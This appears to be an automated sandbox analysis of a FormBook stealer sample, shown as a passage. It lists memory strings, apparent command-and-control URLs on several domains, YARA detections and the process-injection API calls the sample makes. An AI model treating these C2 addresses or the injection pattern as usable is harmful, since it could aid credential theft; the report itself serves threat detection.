72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome frie
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004C52000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000004062000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://applesolve.com/0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.00000000036F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://betta-dom.ru/0hhg/?ABqDW6A8=20u2NLSYHglGGzLXpCvTxXPv5nfEDKk1YS
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.0000000004DE4000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.00000000041F4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4125352041.0000000005661000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bnbuotqakx.shop
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4125352041.0000000005661000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.bnbuotqakx.shop/0hhg/
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netsh.exe, 00000004.00000002.4124592339.000000000492E000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003D3E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Noto
            Source: netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.hover.com/home?source=parked
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033zg
            Source: netsh.exe, 00000004.00000002.4123105715.0000000000F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netsh.exe, 00000004.00000003.2195098353.000000000806E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/hover
            Source: netsh.exe, 00000004.00000002.4124592339.000000000542C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.000000000483C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.cucuzeus88.store/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=nRUqMZh05AeT5XBXy6tvbUigcs6hc4rC
            Source: netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/about?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domain_pricing?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domains/results
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/email?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/privacy?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tools?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tos?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/transfer_in?source=parked
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/hover_domains
            Source: jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/domains/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/hosting/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/hosting/dedicated/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/hosting/shared/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/hosting/vds-vps/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/catalog/ssl/
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/help/oshibka-404_8500.html
            Source: netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://yastatic.net/pcode/adfox/loader.js
            Source: netsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.0000000004DE4000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.00000000041F4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0.2.yZcecBUXN7.exe.5140000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.yZcecBUXN7.exe.5140000.3.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.yZcecBUXN7.exe.3ae4f90.2.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.yZcecBUXN7.exe.2a7f368.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 0.2.yZcecBUXN7.exe.2a81ba8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000000.00000002.1627462031.0000000005140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects downloader injector Author: ditekSHen
            Source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0042AED3 NtClose,1_2_0042AED3
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142B60 NtClose,LdrInitializeThunk,1_2_01142B60
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_01142DF0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_01142C70
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011435C0 NtCreateMutant,LdrInitializeThunk,1_2_011435C0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01144340 NtSetContextThread,1_2_01144340
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01144650 NtSuspendThread,1_2_01144650
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142B80 NtQueryInformationFile,1_2_01142B80
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142BA0 NtEnumerateValueKey,1_2_01142BA0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142BF0 NtAllocateVirtualMemory,1_2_01142BF0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142BE0 NtQueryValueKey,1_2_01142BE0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142AB0 NtWaitForSingleObject,1_2_01142AB0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142AD0 NtReadFile,1_2_01142AD0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142AF0 NtWriteFile,1_2_01142AF0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142D10 NtMapViewOfSection,1_2_01142D10
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142D00 NtSetInformationFile,1_2_01142D00
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142D30 NtUnmapViewOfSection,1_2_01142D30
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142DB0 NtEnumerateKey,1_2_01142DB0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142DD0 NtDelayExecution,1_2_01142DD0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142C00 NtQueryInformationProcess,1_2_01142C00
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142C60 NtCreateKey,1_2_01142C60
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142CA0 NtQueryInformationToken,1_2_01142CA0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142CC0 NtQueryVirtualMemory,1_2_01142CC0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142CF0 NtOpenProcess,1_2_01142CF0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142F30 NtCreateSection,1_2_01142F30
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142F60 NtCreateProcessEx,1_2_01142F60
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142F90 NtProtectVirtualMemory,1_2_01142F90
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142FB0 NtResumeThread,1_2_01142FB0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142FA0 NtQuerySection,1_2_01142FA0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142FE0 NtCreateFile,1_2_01142FE0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142E30 NtWriteVirtualMemory,1_2_01142E30
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142E80 NtReadVirtualMemory,1_2_01142E80
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142EA0 NtAdjustPrivilegesToken,1_2_01142EA0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142EE0 NtQueueApcThread,1_2_01142EE0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01143010 NtOpenDirectoryObject,1_2_01143010
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01143090 NtSetValueKey,1_2_01143090
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011439B0 NtGetContextThread,1_2_011439B0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01143D10 NtOpenProcessToken,1_2_01143D10
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01143D70 NtOpenThread,1_2_01143D70
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B4340 NtSetContextThread,LdrInitializeThunk,4_2_037B4340
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B4650 NtSuspendThread,LdrInitializeThunk,4_2_037B4650
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2B60 NtClose,LdrInitializeThunk,4_2_037B2B60
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2AF0 NtWriteFile,LdrInitializeThunk,4_2_037B2AF0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2AD0 NtReadFile,LdrInitializeThunk,4_2_037B2AD0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2F30 NtCreateSection,LdrInitializeThunk,4_2_037B2F30
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2FE0 NtCreateFile,LdrInitializeThunk,4_2_037B2FE0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2FB0 NtResumeThread,LdrInitializeThunk,4_2_037B2FB0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_037B2EE0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_037B2D30
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_037B2D10
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_037B2DF0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2DD0 NtDelayExecution,LdrInitializeThunk,4_2_037B2DD0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_037B2C70
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2C60 NtCreateKey,LdrInitializeThunk,4_2_037B2C60
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_037B2CA0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B35C0 NtCreateMutant,LdrInitializeThunk,4_2_037B35C0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B39B0 NtGetContextThread,LdrInitializeThunk,4_2_037B39B0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2BF0 NtAllocateVirtualMemory,4_2_037B2BF0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2BE0 NtQueryValueKey,4_2_037B2BE0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2BA0 NtEnumerateValueKey,4_2_037B2BA0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2B80 NtQueryInformationFile,4_2_037B2B80
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2AB0 NtWaitForSingleObject,4_2_037B2AB0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2F60 NtCreateProcessEx,4_2_037B2F60
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2FA0 NtQuerySection,4_2_037B2FA0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2F90 NtProtectVirtualMemory,4_2_037B2F90
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2E30 NtWriteVirtualMemory,4_2_037B2E30
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2EA0 NtAdjustPrivilegesToken,4_2_037B2EA0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2E80 NtReadVirtualMemory,4_2_037B2E80
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2D00 NtSetInformationFile,4_2_037B2D00
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2DB0 NtEnumerateKey,4_2_037B2DB0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2C00 NtQueryInformationProcess,4_2_037B2C00
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2CF0 NtOpenProcess,4_2_037B2CF0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B2CC0 NtQueryVirtualMemory,4_2_037B2CC0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B3010 NtOpenDirectoryObject,4_2_037B3010
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B3090 NtSetValueKey,4_2_037B3090
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B3D70 NtOpenThread,4_2_037B3D70
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_037B3D10 NtOpenProcessToken,4_2_037B3D10
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C27600 NtCreateFile,4_2_00C27600
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C27760 NtReadFile,4_2_00C27760
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C278F0 NtClose,4_2_00C278F0
            Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C27850 NtDeleteFile,4_2_00C27850
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 0_2_00CC30D00_2_00CC30D0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0040F9731_2_0040F973
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_004029D01_2_004029D0
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_004012101_2_00401210
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0042D3531_2_0042D353
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_004163131_2_00416313
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_004033801_2_00403380
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0040FB931_2_0040FB93
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0040DC101_2_0040DC10
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0040DC131_2_0040DC13
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0040271D1_2_0040271D
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_004027201_2_00402720
